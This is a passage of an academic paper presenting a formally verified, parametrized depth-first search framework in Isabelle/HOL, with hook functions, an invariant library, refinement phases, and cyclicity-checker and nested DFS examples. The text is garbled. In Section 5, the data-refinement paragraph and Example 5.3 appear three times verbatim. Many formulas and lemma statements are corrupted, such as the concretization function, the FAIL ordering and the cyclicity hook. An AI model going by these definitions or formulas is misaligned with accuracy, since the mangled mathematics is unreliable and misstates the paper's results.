For refinement, we distinguish two orthogonal issues: Structural refinement concerns the overall structure of the algorithm. To this end, our framework currently supports recursive and tail-recursive implementations. Data refinement concerns the representation of the state. It allows to refine to a concrete state with its content tailored towards the specific requirements of the parametrization. This includes projecting away parts of the state that are not needed by the actual algorithm, as well as representing the state by efficient...
data structures. Here, our framework supports some commonly used
of the base state, and an integration with the Autoref-
Tool [7]. This tool synthesizes a refined algorithm that uses efficient
executable data structures provided by the Isabelle Collections
Framework [10], and can be exported to executable code by the
code generator of Isabelle/HOL [8].
The framework comes bundled with multiple instantiations,
which mostly stem from requirements of the CAVA model checker [4].
We provide implementations for a cyclicity checker, a safety prop-
erty model checker, the nested DFS variant of [16] and Tarjan’s
SCC algorithm.
The whole formalization is available online at
http://cava.in.tum.de/CPP15
Structure The structure of the paper follows roughly the layout
from above. We start with an overview about related work in
Section 3. In Section 4, we describe the generic framework of
the parametrized DFS. After a primer on refinement in Section 5, the
proof architecture and library invariants are covered in Section 6.
Finally, in Section 7, we attend to the different refinement phases,
before concluding the paper in Section 8.
3. Related Work
While depth-first search is a well-known and widespread algorithm,
not much work has been done on its formal verification. A very basic
stand-alone formalization was done by Nishihara and Minamide
[14], where two variants of a basic DFS are given (one with explicit
stack, one without) and their equality is shown. Furthermore a couple
of basic invariants are proved and code export is possible. But there
is neither parametrization (it can solely compute the set of reachable
nodes) nor flexible representation of the graph: It is fixed as a list of
pairs.
Another basic approach is given by Pottier [13], where DFS
is formalized in Coq to prove correct Kosaraju’s algorithm for
computing the strongly connected components. This formalization
also allows for program extraction, but does not allow easy extension
for use in other algorithms.
We described a first approach to a DFS framework in [12], on
which this paper is based. The availability of a more advanced
refinement framework (cf. Section 5) allows for a cleaner, more
general, and more elegant framework. One notable improvement
is that the hook functions are now specified in the nondeterminism
monad of the refinement framework. This way the refinement based
approach can also be used to develop the hook functions, which was
not possible in [12]. Another improvement is the introduction of
the most specific invariant (cf. Section 6), opposed to the notion of
DFS-constructable in [12], which allows for an easier process of
proving invariants.
In contrast to our development in [9], where we provide a
collection of abstract lemmas that help in proving correct similar
algorithms, the framework described in this paper is parameterized
with hook functions that are invoked on well-defined extension
points. This approach is less general, but greatly reduces the effort
of instantiating it for new algorithms, as only the functions for
the extension points have to be specified, while in [9] the whole
algorithm has to be re-written.
4. Generic Framework
In its most well-known formulation, depth-first search is a very
simple algorithm: For each node \( v_0 \) from a given set \( V_0 \) of start
nodes, we invoke the function DFS. This function, if it has not seen
the node yet, recursively invokes itself for each successor of the node.
\[
\text{discovered} = \{\}
\text{foreach} v_0 \in V_0 \text{ do DFS } v_0
\]
DFS: \[
\text{if } u \notin \text{discovered then}
\text{discovered} = \text{discovered} \cup \{u\}
\text{foreach } v \in E^\ast \{u\} \text{ do DFS } v
\]
Note that we use \( E \) for the (fixed) set of edges of the graph
and \( R \setminus S \) for the image of a set under the relation \( R \) (in particular,
\( E^\ast \{v\} \) denotes the set of successors of the node \( v \)).
In this simple form, the algorithm can only be used to create the
set of reachable nodes, i.e., discovered. However, our aim, as laid
out before, is to cover DFS based algorithms in general. Therefore
we need to develop another view of the algorithm:
1. The algorithm above was given in a recursive form. For a
correctness proof, we need to establish invariants for the two
foreach-loops, and a pair of pre- and postcondition for the
recursive call. This quite complex proof structure impedes the
design of our framework. Thus, we use an iterative formulation
of DFS that only consists of a single loop. Correctness proofs
are done via a single loop invariant.
2. The simple algorithm above only computes a set of discovered
nodes. However, in general, one wants to build up a DFS forest
with cross and back edges and discovered and finished times.
3. To generalize over different DFS-based algorithms, we provide
a skeleton DFS algorithm, which is parameterized by hook
functions that are called from well-defined extension points,
and modify an opaque extension state. Moreover, we add an
additional break condition, which allows to interrupt the search
prematurely, before all reachable nodes have been explored.
The skeleton algorithm is defined as follows:
\[
\text{DFS\_step:}
\text{if stack = }[] \text{ then}
\text{choose } v_0 \text{ from } V_0 \cap (\text{UNIV} \setminus \text{discovered})
\text{new\_root } v_0; \text{on\_new\_root } v_0
\text{else}
(u,V) = \text{get\_pending}
\text{case } V \text{ of}
None \Rightarrow \text{finish } u; \text{on\_finish } u
| \text{Some } v \Rightarrow
\text{if } v \notin \text{discovered then}
\text{discover } u; \text{on\_discover } u v
\text{else if } v \in \text{set stack then}
\text{back\_edge } u v; \text{on\_back\_edge } u v
\text{else}
\text{cross\_edge } u v; \text{on\_cross\_edge } u v
\text{cond } s:
\neg \text{is\_break} \land (V_0 \subseteq \text{discovered} \rightarrow \text{stack} \neq [])
\]
DFS:
\text{init; on\_init}
\text{while } cond \text{ do}
\text{DFS\_step}
The step-function has five cases. In each case, we first perform a
transformation on the base part of the state (e.g., finish), and then
call the associated hook function (e.g., on_finish). Note that hook
functions only modify the extension state. We now describe the
cases in more detail: If the stack is empty, we choose a start node
that has not yet been discovered (the condition guarantees that there
is one). The new\_root-function pushes this node on the stack and
2 2016/1/21
marks it as discovered. Moreover, it declares all outgoing edges as pending.
If the stack is non-empty, the get_pending-function tries to select a pending edge starting at the node \( v \) on top of the stack. If there are no such edges left, the finish-function pops \( u \) off the stack. Otherwise, we have selected a pending edge \((u,v)\). If the node \( v \) has not yet been discovered, the discover-function marks it as discovered, pushes it on the stack, and declares all its outgoing edges as pending. Otherwise, we distinguish whether \( v \) is on the stack, in which case we have encountered a back edge, or not, in which case we have encountered a cross edge. The corresponding basic functions back_edge and cross_edge have no effect on the stack or the set of discovered nodes.
Note that we have not given an explicit definition of any basic function (e.g., finish, get_pending), but only stated behavioral requirements. Similarly, we have not described the exact content of the state, but merely expected it to contain a stack, a set of discovered nodes, and a set of pending edges. We will first initialize this generic algorithm with a very detailed state (cf. Section 6.1) and corresponding operations, and then refine it to more suitable states and operations, based on the requirements of the parameterization (cf. Section 7.1).
We now describe two different show-cases on how to instantiate our framework to useful algorithms:
Example 4.1. A simple application of DFS is a cycllicity check, based on the fact that there is a back edge if and only if there is a reachable cycle. The state extension consists of a single flag cyc, which signals that a back edge has been encountered, and causes the algorithm to terminate prematurely. The hooks are implemented as follows, where omitted ones default to skip:
\[
\begin{align*}
on_{init} & : \text{cyc} = \text{False} \ (\ast \text{initially no cycle has been found} \ast) \\
is_{break} & : \text{cyc} = \text{True} \ (\ast \text{cycle!} \ast) \\
on_{back\_edge} & : \text{u} \leftarrow \text{v} \ (\ast \text{cycle!} \ast)
\end{align*}
\]
Example 4.2. Another important family of DFS based algorithms is nested depth-first search \([3,6,16]\), which is used in model checkers to find acceptance cycles in Büchi-automata. A nested DFS algorithm consists of two phases, blue and red. The blue phase walks the graph to find accepting nodes. On backtracking from such a node it starts the red phase. This phase tries to find a cycle containing this accepting node – depending on the specific algorithm, it searches for a path to a node on the stack, or to the accepting node. In any case, the red phase does not enter nodes which were already discovered by another red search.
The idea behind red search is not a concept specific to nested DFS, but is of a more general nature: Find a non-empty path to a node with a certain property, possibly excluding a set of nodes. The latter set has to be closed (i.e., there must be no edges leaving it) and must not contain any node with the property in question. Using our DFS framework, we formalize this algorithm as find_path[\_excl] V0 P X for some set of start nodes V0, some property P and a set of nodes to exclude X. It returns either a path to a node with property P, or a new exclusion X’ = X \cup E^+ \{V0\} that is also closed and does not contain a node with property P. Note that we use E^+ for the transitive closure of E.
For the following description of the nested DFS formalization, we assume find_path[\_excl] to be given.
The extension to the state needed for nested DFS consists of two parts: The lasso (i.e., an accepting cycle plus a reaching path from a start node) and all the nodes visited by red searches. Therefore the obvious hooks are
\[
\begin{align*}
on_{init} & : \text{lasso} = \text{None}; \text{red} = \{\} \\
is_{break} & : \text{lasso} \neq \text{None}.
\end{align*}
\]
The next hook to implement is on_finish, where the red phase (that is find_path[\_excl]) has to be run. We define the auxiliary function run_red[\_dfs] as follows:
\[
\text{run_red[\_dfs] u}:
\begin{align*}
\text{case find_path[\_excl] \{u\} \{x. x \in \text{set stack}\} \text{ red of}} \\
\text{Inl X’} & \Rightarrow (\ast \text{no path, but new exclusion} \ast) \\
\text{red} & = X’ \\
\text{Inr p} & \Rightarrow (\ast \text{path} \ast) \\
\text{lasso} & = \text{make_lasso p}
\end{align*}
\]
The hook is then defined as
\[
on_{finish} u: \text{if accepting u then run_red[\_dfs] u}.
\]
For more recent optimizations of nested DFS, like cycle detection on back edges \([16]\), some other hooks have to be instantiated, too.
5. The Isabelle Refinement Framework
In order to formalize algorithms such as depth-first-search, it is advantageous to start with an abstract description of the algorithmic idea, on which the correctness proof can be done in a concise way. The abstract description usually includes nondeterminism and is not executable.
For example, the get_pending-function in our skeleton algorithm (cf. Section 4) does not specify an order in which pending edges are selected, i.e., any pending edge may be chosen nondeterministically. Moreover, the set type used for the successors of a node has no counterpart in common programming languages, e.g., there is no set datatype in Standard ML.
Once the abstract algorithm is proved correct, it is refined towards a fully deterministic, executable version, possibly via multiple refinement steps. Each refinement step is done in a systematic way that guarantees preservation of correctness. For example, one can implement the graph by adjacency lists, and process the pending edges in list order.
The refinement approach simplifies the formalization by separating the correctness proof of the abstract algorithmic ideas from the correctness proof of the concrete implementation. Moreover, it allows to re-use the same abstract correctness proof with different implementations.
In Isabelle, this approach is supported by the Isabelle Refinement and Collections Frameworks \([10,11]\), and the Autoref tool \([7]\). Using ideas of refinement calculus \([1]\), the Isabelle Refinement Framework provides a set of tools to concisely express nondeterministic programs, reason about their correctness, and refine them (in possibly many steps) towards efficient implementations. The Isabelle Collections Framework provides a library of verified efficient data structures for standard types such as sets and maps. Finally, the Autoref tool automates the refinement to efficient implementations, based on user-adjustable heuristics for selecting suitable data structures to implement the abstract types.
In the following, we describe the basics of the Isabelle Refinement Framework. The result of a (possibly nondeterministic) algorithm is described as a set of possible values, plus a special result FAIL that characterizes a failing assertion.
\[
data\text{type a nres = RES a set \{ FAIL\}}
\]
On results, we define an ordering by lifting the subset ordering, FAIL being the greatest element.
\[
\begin{align*}
\text{RES X} \leq \text{RES Y}\ (\ast \text{if X \subseteq Y} \ast) \\
\text{m} \leq \text{FAIL} \ (\ast \text{FAIL \ \leq \ RES X} \ast)
\end{align*}
\]
Note that this ordering forms a complete lattice, where RES \{\} is the bottom, and FAIL is the top element. The intuitive meaning of \( m \leq m’ \) is that all possible values of \( m \) are also possible for \( m’ \).
say that \( m \) refines \( m' \). In order to describe that all values in \( m \) satisfy a condition \( \Phi \), we write \( m \leq \text{spec } x. \Phi x \) (or shorter: \( m \leq \text{spec } \Phi \)), where \( \text{spec } x. \Phi x \equiv \text{RES } \{ x. \Phi x \} \).
**Example 5.1.** Let \( \text{cyc_checker } E \ V0 \) be an algorithm that checks a graph over edges \( E \) and start nodes \( V0 \) for cyclicity. Its correctness is described by the following formula, that should return \( \text{true} \) if and only if the graph contains a cycle reachable from \( V0 \), which is expressed by the predicate cyclic:
\[
\text{cyc_checker } E \ V0 \leq \text{spec } r. \ r = \text{cyclic } E \ V0
\]
Now let \( \text{cyc_checker_impl } \) be an efficient implementation\(^1\) of \( \text{cyc_checker } \). For refinement, we have to prove:
\[
\text{cyc_checker_impl } E \ V0 \leq \text{cyc_checker } E \ V0.
\]
Note that, by transitivity, we also get that the implementation is correct:
\[
\text{cyc_checker_impl } E \ V0 \leq \text{spec } r. \ r = \text{cyclic } E \ V0.
\]
To express nondeterministic algorithms, the Isabelle Refinement Framework uses a monad over nondeterministic results. It is defined by
\[
\begin{align*}
\text{return } x & \equiv \text{RES } \{ x \} \\
\text{bind } f. F x & \equiv \text{RES } \{ x \in X. f x \}
\end{align*}
\]
Intuitively, return \( x \) returns the deterministic outcome \( x \), and \( \text{bind } f. F x \) is sequential composition, which describes the result of nondeterministically choosing a value from \( m \) and applying \( f \) to it. In this paper, we write \( x = m; f x \) instead of \( \text{bind } m \ f \), to make program text more readable.
Recursion is described by a least fixed point, i.e., a function \( F \) with recursion equation \( F x = B F x \) is described by \( \text{ifp } (\lambda F. B F ) x \).
To increase readability, we write a recursive function definition as \( F x = B F x \). Based on recursion, the Isabelle Refinement Framework provides \texttt{while} and \texttt{foreach} loops. Note that we agree on a partial correctness semantics in this paper\(^2\), i.e., infinite executions do not contribute to the result of a recursion.
Another useful construct are assertions:
\[
\begin{align*}
\text{assert } \Phi & \equiv \text{if } \Phi \text{ then return } () \text{ else FAIL.}
\end{align*}
\]
An assertion generates an additional proof obligation when proving a program correct. However, when refining the program, the condition of the assertion can be assumed.
**Example 5.2.** The following program removes an arbitrary element from a non-empty set. It returns the element and the new set.
\[
\begin{align*}
\text{select } s:\quad & \text{assert } s \neq \{\}; \\
& x = \text{spec } x.\ x \in s; \\
& \text{return } (x, x - \{x\})
\end{align*}
\]
The assertion in the first line expresses the precondition that the set is not empty. If the set is empty, the result of the program is \( \text{FAIL} \). The second line nondeterministically selects an element from the set, and the last line assembles the result: A pair of the element and the new set.
Using the verification condition generator of the Isabelle Refinement Framework, it is straightforward to prove the following lemma, which states that the program refines the specification of the correct result:
\[
(\forall x s. s \neq \{} \implies \text{select } s \leq \text{spec } (x, s'). \{x \in s \land s' = s - \{x\}\})
\]
Typically, a refinement also changes the representation of data, e.g., a set of successor nodes may be implemented by a list. Such a data refinement is described by a relation \( R \) between concrete and abstract values. We define a concretization function \( \langle R \rangle \), that maps an abstract result to a concrete result:
\[
\langle R \rangle \text{FAIL} \equiv \text{FAIL} \\
\langle R \rangle \text{RES } X \equiv \{ x. \ \exists x \in X. (x, x) \in R \}
\]
Intuitively, \( \langle R \rangle m \) contains all concrete values with an abstract counterpart in \( m \).
**Example 5.3.** A finite set can be implemented by a duplicate-free list of its elements. This is described by the following relation:
\[
\text{ls_rel } \equiv \{ (l.s), \set l = s \land \text{distinct } l \}
\]
The select-function from Example 5.2 can be implemented on lists as follows:
\[
\begin{align*}
\text{select'} l:\quad & \text{assert } l \neq []; \\
& x = \text{hd } l; \\
& \text{return } (x, tl l)
\end{align*}
\]
Again, it is straightforward to show that select' refines select:
\[
(\forall x l ls. l \in ls \rightarrow \text{select } l \leq \langle \text{ls_rel } \rangle (\text{select } s))
\]
Typically, a refinement also changes the representation of data, e.g., a set of successor nodes may be implemented by a list. Such a data refinement is described by a relation \( R \) between concrete and abstract values. We define a concretization function \( \langle R \rangle \), that maps an abstract result to a concrete result:
\[
\langle R \rangle \text{FAIL} \equiv \text{FAIL} \\
\langle R \rangle \text{RES } X \equiv \{ x. \ \exists x \in X. (x, x) \in R \}
\]
Intuitively, \( \langle R \rangle m \) contains all concrete values with an abstract counterpart in \( m \).
**Example 5.3.** A finite set can be implemented by a duplicate-free list of its elements. This is described by the following relation:
\[
\text{ls_rel } \equiv \{ (l.s), \set l = s \land \text{distinct } l \}
\]
The select-function from Example 5.2 can be implemented on lists as follows:
\[
\begin{align*}
\text{select'} l:\quad & \text{assert } l \neq []; \\
& x = \text{hd } l; \\
& \text{return } (x, tl l)
\end{align*}
\]
Again, it is straightforward to show that select' refines select:
\[
(\forall x l ls. l \in ls \rightarrow \text{select } l \leq \langle \text{ls_rel } \rangle (\text{select } s))
\]
Typically, a refinement also changes the representation of data, e.g., a set of successor nodes may be implemented by a list. Such a data refinement is described by a relation \( R \) between concrete and abstract values. We define a concretization function \( \langle R \rangle \), that maps an abstract result to a concrete result:
\[
\langle R \rangle \text{FAIL} \equiv \text{FAIL} \\
\langle R \rangle \text{RES } X \equiv \{ x. \ \exists x \in X. (x, x) \in R \}
\]
Intuitively, \( \langle R \rangle m \) contains all concrete values with an abstract counterpart in \( m \).
**Example 5.3.** A finite set can be implemented by a duplicate-free list of its elements. This is described by the following relation:
\[
\text{ls_rel } \equiv \{ (l.s), \set l = s \land \text{distinct } l \}
\]
The select-function from Example 5.2 can be implemented on lists as follows:
\[
\begin{align*}
\text{select'} l:\quad & \text{assert } l \neq []; \\
& x = \text{hd } l; \\
& \text{return } (x, tl l)
\end{align*}
\]
Again, it is straightforward to show that select' refines select:
\[
(\forall x l ls. l \in ls \rightarrow \text{select } l \leq \langle \text{ls_rel } \rangle (\text{select } s))
\]
**6. Proof Architecture**
Recall that we have phrased the DFS algorithm as a single loop of the form:
\[
\text{init; while cond do step}
\]
Using the monad of the refinement framework, this is implemented by explicitly threading through the state, i.e.,
\[
\text{let } s = \text{init}; (\text{while } (\lambda s. \text{cond } s) \text{ do } (\lambda x. \text{step } s) s)
\]
For better readability, we introduce the convention to omit the state parameter whenever it is clear which state to use.
Properties of the DFS algorithm are shown by establishing invariants, i.e., predicates that hold for all reachable states of the DFS algorithm.
The standard way to establish an invariant is to generalize it to an inductive invariant, and show that it holds for the initial state, and is preserved by steps of the algorithm. When using this approach naïvely, we face two problems:
1. The invariant to prove an algorithm correct typically is quite complicated. Proving it in one go results in big proofs that tend to get unreadable and hard to maintain. Moreover, there are many basic invariants that are used for almost all DFS-based
algorithms. These have to be re-proved for every algorithm, which is contrary to our intention to provide a framework that eliminates redundancy. Thus, we need a solution that allows us to establish invariants incrementally, re-using already established invariants to prove new ones.
2. Our refinement framework allows for failing assertions. If the algorithm may reach a failing assertion, we cannot establish any invariants. Thus we can only establish invariants of the base algorithm under the assumption that the hook functions do not fail. However, we would like to use invariants of the base algorithm to show that the whole algorithm is correct, in particular that the hook functions do not fail. Thus, we need a solution that allows us to establish invariants for the non-failing reachable states only, and a mechanism that later transfers these invariants to the actual algorithm.
In the following, we describe the proof architecture of our DFS framework, which solves some of these problems. First, we define the operator $\leq_n$ by $m \leq_n m' \equiv m \neq FAIL \rightarrow m \leq m'$. Thus, $m \leq_n \Phi$ means, that $m$ either fails or all its possible values satisfy $\Phi$. With this, an inductive invariant of the non-failing part of the algorithm can be conveniently expressed as
$$\text{is\_ind\_invar} P \equiv \text{init} \leq_n \text{spec } P \land \forall s. \text{P } s \land \text{cond } s \rightarrow \text{step } s \leq_n \text{spec } P.$$
It is straightforward to show that there exists a most specific invariant $I$, i.e., an inductive invariant that implies all other inductive invariants:
$$\text{is\_ind\_invar} I \text{ and } \text{is\_ind\_invar} P; I s \Rightarrow P s$$
In order to establish invariants of the algorithm, we show that they are inductive invariants when combined with $I$. This leads to the following rule, which shows consequences of the most specific invariant:
**lemma establish\_invar:**
- assumes $\text{init} \leq_n \text{spec } P$
- assumes $\forall s. \text{cond } s ; I s ; P s \Rightarrow \text{step } s \leq_n \text{spec } P$
- shows $I s \Rightarrow P s$
When discharging the proof-obligation for a step, introduced by the second premise of this rule, we may assume $I s$, and thus re-use invariants that we have already proved.
In order to use invariants to show properties of the algorithm, we use the fact that at the end of a loop, the invariant holds and the condition does not:
- $\text{init; while } \text{cond do step} \leq_n \text{spec } s. I s \land \neg \text{cond } s$
Finally, we use the following rule to show that the algorithm does not fail:
**lemma establish\_nofail:**
- assumes $\text{init} \neq \text{FAIL}$
- assumes $\forall s. \text{cond } s ; I s \Rightarrow \text{step } s \neq \text{FAIL}$
- shows $\text{init; while } \text{cond do step} \neq \text{FAIL}$
To simplify re-using and combining of already established invariants, we define a locale $\text{DFS\_invar}$, which fixes a state $s$ and assumes that the most specific invariant holds on $s$. Whenever we have established an invariant $P$, we also prove $P s$ inside this locale. In a proof to establish an invariant, we may interpret the locale, to have the already established invariants available.
---
**Example 6.1.** In our parameterized DFS framework, we provide a version of $\text{establish\_invar}$ that splits over the different cases of $\text{step}$, and is focused on the hook functions:
**lemma establish\_invar:**
- assumes $\text{init; on\_init} \leq_n \text{spec } x. P (\text{empty\_state } x)$
- assumes $\text{new\_root; } \forall y. \exists s'. \text{pre\_on\_new\_root } y s' \rightarrow \text{on\_new\_root } y s' \leq_n \text{spec } P (s'\text{'more } := x)$
- assumes $\text{finish; } \forall s. \text{pre\_on\_finish } u s s' \rightarrow \text{on\_finish } u s' \leq_n \text{spec } x. P (s'\text{'more } := x)$
- assumes $\text{cross\_edge; } \forall u v s s'. \text{pre\_on\_cross\_edge } u v s s' \rightarrow \text{on\_cross\_edge } u v s' \leq_n \text{spec } x. P (s'\text{'more } := x)$
- assumes $\text{back\_edge; } \forall u v s s'. \text{pre\_on\_back\_edge } u v s s' \rightarrow \text{on\_back\_edge } u v s' \leq_n \text{spec } x. P (s'\text{'more } := x)$
- assumes $\text{discover; } \forall u v s s'. \text{pre\_on\_discover } u v s s' \rightarrow \text{on\_discover } u v s' \leq_n \text{spec } x. P (s'\text{'more } := x)$
shows $\text{is\_invar } P$
Here, $\text{is\_invar } P$ states that $P$ is an invariant, $s'\text{'more } := x)$ is the state $s'$ with the extension part updated to $s$, and the $\text{pre\_}$-predicates define the preconditions for the calls to the hook functions. For example, we have
- $\text{on\_finish } u s s' \equiv \text{DFS\_invar } s \land \text{cond } s$
- $\text{stack } s \neq \emptyset \land u = \text{hd } (\text{stack } s)$
- $\text{pending } s \equiv \{ s \} \land \text{finish } u s$
That is, the invariant holds on state $s$ and $s$ has no more pending edges from the topmost node on the stack. The state $s'$ emerged from $s$ by executing the $\text{finish}\_\text{operation}$ on the base DFS state.
A typical proof of an invariant $P$ has the following structure:
**lemma P\_invar; is\_invar P**
**proof (induction rule; establish\_invar)**
**case (discover u v s s')**
**then interpret DFS\_invar s by simp**
**show on\_discover u v s' \leq_n spec x. P (s'\text{'more } := x))**
**next**
**...**
**qed**
**lemmas (in DFS\_invar) P = P\_invar[THEN xfer\_invar]**
The proof of the first lemma illustrates how the proof language Isar is used to write down a human-readable proof. The different cases that we have to handle correspond to the assumptions of the lemma establish\_invar. The interpret command makes available all definitions and facts from the locale DFS\_invar, which can then be used to show the statement. The second lemma just transfers the invariant to the DFS\_invar locale, in which the fact $P s$ is now available by the name $P$.
Note that this Isar proof scheme is only suited for invariants with complex proofs. Simpler invariant proofs can often be stated on a single line. For example, finiteness of the discovered edges is proved as follows:
**lemma is\_invar (\forall s. finite (edges s))**
by (induction rule; establish\_invar) auto
---
**6.1 Library of Invariants**
In the previous section we have described the proof architecture, which enables us to establish invariants of the depth-first search algorithm. In this section, we show how this architecture is put to use.
We define an abstract DFS algorithm, which is an instance of the generic architecture presented in Section 4. Its state contains discovery and finished times of nodes, and a search forest with additional back and cross edges. In detail, the state consists of:
The abstract basic operations (e.g., finish, get_pending) are defined accordingly, fulfilling the requirements of the generic framework.
Based on this, we provide a variety of invariants, which use the information in the state at different levels of detail. Note that these invariants do not depend on the extension part of the state, and thus can be proven independently of the hook functions, which only update the extension part. Further note that we present them as they occur in the locale DFS_invar, which fixes the state and assumes that the most specific invariant holds (cf. Section 6).
For the sets dom \( \delta \) of discovered and dom \( \varphi \) of finished nodes, we prove, among others, the following properties:
**Lemma stack_set_def:** set stack = dom \( \delta \) – dom \( \varphi \)
**Lemma finished_closed:** E' dom \( \varphi \) ⪯ dom \( \delta \)
**Lemma nc_finished_eq_reachable:**
\( \neg \text{cond} \land \neg \text{is_break} \implies \text{dom} \ \varphi = E' \times \text{V0} \)
The first lemma states that the nodes on the stack are exactly those that have already been discovered, but not yet finished. The second lemma states that edges from finished nodes lead to discovered nodes, and the third lemma states that the finished nodes are exactly the nodes reachable from \( \text{V0} \) when the algorithm terminates without being interrupted.
We also prove more sophisticated properties found in standard textbooks (e.g., [2], pp. 606–608), like the Parenthesis Theorem (the discovered/finished intervals of two nodes are either disjoint or the one is contained in the other, but there is no overlap) or the White-Path Theorem (a node \( v \) is reachable in the search tree from a node \( u \) iff there is a white path from \( v \) to \( u \), i.e., a path where all nodes are not yet discovered when \( v \) is).
**Lemma parenthesis:**
assumes \( v \in \text{dom} \ \varphi \) and \( w \in \text{dom} \ \varphi \)
and \( \delta v < \delta w \)
shows \( (\ast \text{disjoint} \ast) \ \varphi v < \delta w \lor (\ast w \text{contains} w \ast) \ \varphi w < \varphi v \)
**Lemma white_path:**
assumes \( v \in E' \times \text{V0} \) and \( w \in E' \times \text{V0} \)
and \( \neg \text{cond} \land \neg \text{is_break} \)
shows white_path \( v w \iff (v,w) \in \text{tree}^* \)
The Parenthesis Theorem is important to reason about paths in the search tree, as it allows us to gain insights just by looking at the timestamps:
**Lemma tree_path_iff_parenthesis:**
assumes \( v \in \text{dom} \ \varphi \) and \( w \in \text{dom} \ \varphi \)
shows \( (v,w) \in \text{tree}^* \)
\( \iff \delta v < \delta w \land \varphi v > \varphi w \)
From the location of two nodes in the search tree, we can deduce several properties of those nodes (e.g., the \( \rightarrow \) direction of tree_path_iff_parenthesis). This can be used, for example, to show properties of back edges, as
**Lemma back_edge_impl_tree_path:**
\[
[(v,w) \in \text{back_edges}; v \neq w] \implies (v,w) \in \text{tree}^*.
\]
It can also be used to establish invariants about the root of a strongly connected component, i.e., the node of an SCC with the highest position in the tree, because
**Lemma scc_root_scc_tree_tranc:**
\[
[(\text{scc_root} v) \times \text{scc}; x \in \text{scc}; x \in \text{dom} \delta; x \neq v] \implies (v,x) \in \text{tree}^*.
\]
Utilizing the knowledge about the search tree, we can then show that a node of an SCC is its root iff it has the minimum discovery time of the SCC. This is an important fact, for example in the proof of Tarjan’s SCC Algorithm.
**Example 6.2.** The idea of cycles in the set of reachable edges is independent of any DFS instantiation. Therefore we can provide invariants about the (acyclicity of those edges in the general library, the most important one linking acyclicity to the existence of back edges:
**Lemma cycle_iff_back_edges:**
acyclic edges \( \iff \text{back_edges} = \{\} \)
Here, edges is the union of all tree, cross, and back edges.
The \( \rightarrow \) direction follows as an obvious corollary of the lemma back_edge_impl_tree_path shown above. The \( \implies \) direction follows from the fact that acyclic (tree \( \cup \) cross_edges), the proof of which uses the Parenthesis Theorem.
Moreover, we need the fact that at the end of the search edges is the set of all reachable edges:
**Lemma nc_edges_covered:**
assumes \( \neg \text{cond} \) and \( \neg \text{is_break} \)
shows E \( \cap (E' \times \text{V0}) \times \text{UNIV} = \text{edges} \)
With those facts from the library, we recall the definition of the cyclicity checker in our framework as presented in Example 4.1. Let cyc be that instantiation.
As the cyc flag is set when a back edge is encountered, the following invariant is easily proved:
**Lemma i_cyc_eq_back:**
is_invar (\( s. \) cyc \( s \iff \text{back_edges} s \neq \{\} \))
apply (induct rule: establish_invar)
apply (simp_all add: cond_def cong: cyc_more_cong)
apply (simp add: empty_state_def)
done
This happens to be the only invariant that needs to be shown for the correctness proof. Using the invariants mentioned above, we easily get the following lemma inside the locale DFS_invar, i.e., under the assumption \( I s \):
**Lemma (in DFS_invar) cyc_correct_aux:**
assumes \( \neg \text{cond} s \)
shows \( \neg \text{acyclic} (E \cap (E' \times \text{V0}) \times \text{UNIV}) \)
Intuitively, this lemma states that the cyc flag is equivalent to the existence of a reachable cycle upon termination of the algorithm. Finally, we gain the correctness lemma of the cyclicity checker as an easy consequence:
\[
\text{cyc} E \text{V0} \neq \text{spec} s.
\]
\[
\text{cyc} s \iff \neg \text{acyclic} (E \cap (E' \times \text{V0}) \times \text{UNIV}).
\]
7. Refinement
In Section §6, we have described the abstract DFS framework. We phrased the algorithm as a step-function on a state that contained detailed information. In order to implement an actual DFS-algorithm, most of this information is typically not required, and the required information should be represented by efficient data structures. Moreover, we want to choose between different implementation styles, like recursive or tail-recursive.
For this, our framework splits the refinement process into three phases: In the projection phase, we get rid of unnecessary information in the state. In the structural refinement phase, we choose the implementation style. Finally, in the code generation phase, we choose efficient data structures to represent the state, and extract executable code from the formalization.
Although the refinements are applied sequentially, our design keeps the phases as separated as possible, to avoid a cubic blowup of the formalization in the number of different states, implementation styles and efficient data structures.
7.1 Projection
To get a version of the algorithm over a state that only contains the necessary information, we use data refinement: We define a relation between the original abstract state and the reduced concrete state, as well as the basic operations on the concrete state. Then, we show that the operations on the concrete state refine their abstract counterparts. Using the refinement calculus provided by the Isabelle Refinement Framework, we easily lift this result to show that the concrete algorithm refines the abstract one.
In order to be modular w.r.t. the hook operations, we provide a set of standard implementations together with their refinement proofs, assuming that we have a valid refinement for the hooks. As for the abstract state, we also use extensible records for the concrete state. Thus, we obtain templates for concrete implementations, which are instantiated with a concrete data structure for the extension part of the state, a set of concrete hook operations, and refinement theorems for them.
Example 7.1. For many applications, such as the cyclicity checker from Example §5, it suffices to keep track of the stack, the pending edges, and the set of discovered nodes. We define a state type
```plaintext
record 'v simple_state =
stack :: ('v × 'v set) list,
on_stack :: 'v set,
visited :: 'v set
```
and a corresponding refinement relation
```plaintext
(s', s) ∈ RS ≡
stack' = map (λu. (u.pending s \ u)) (stack s) ∧
on_stack s' = set (stack s) ∧
visited s' = dom (δ s) ∧
(more s', more s) ∈ X.
```
Note that we store the pending edges as part of the stack, and provide an extra field on_stack that stores the set of nodes on the stack. This is done with the implementation in mind, where cross and back edges are identified by a lookup in an efficient set data structure and the stack may be projected away when using a recursive implementation. Moreover, we parameterize the refinement relation with a relation X for the extension state.
Next, we define a set of concrete operations. For example, the concrete discover operation is defined as:
```plaintext
discover' u v:
stack = \{v, E \{v\}\} # stack
on_stack = insert v on_stack
visited = insert v visited
```
It is straightforward to show that discover' refines the abstract discover-operation:
```plaintext
lemma discover_refine:
assumes (s', s) ∈ RS
shows discover' u v s' ≤⇓ RS discover u v s
```
Assuming refinement of all hook operations, we get refinement of the abstract algorithm:
```plaintext
lemma refine:
assumes on_init' ≤⇓ X on_init
and \{v0 s0 s'. [pre_on_new_root v0 s0; (s', s) ∈ RS] \} ⇒ on_new_root s' ≤⇓ X on_new_root s
and ... shows DFS' ≤⇓ RS DFS
```
where DFS' is the DFS-algorithm over the concrete operations.
We also provide further implementations, which both require the hooks for back and cross edges to have no effect on the state. Thus the corresponding cases can be collapsed and there is no need to implement the on_stack set. As an additional optimization we pre-initialize the set of visited nodes to simulate a search with some nodes excluded. As an example, this is used in the inner DFS of the nested DFS algorithm (cf. Example §4.2).
For the cyclicity checker, we define the concrete state by extending the simple_state record:
```plaintext
record 'v cycc_state_impl = 'v simple_state +
cyc :: bool
```
The extension state will be refined by identity, i.e., the refinement relation for the concrete state is RS. We also define a set of concrete hook operations (which look exactly like their abstract counterparts)
```plaintext
on_init_impl: cyc = False
is_break_impl: cyc
on_back_edge_impl u v: cyc \ True
```
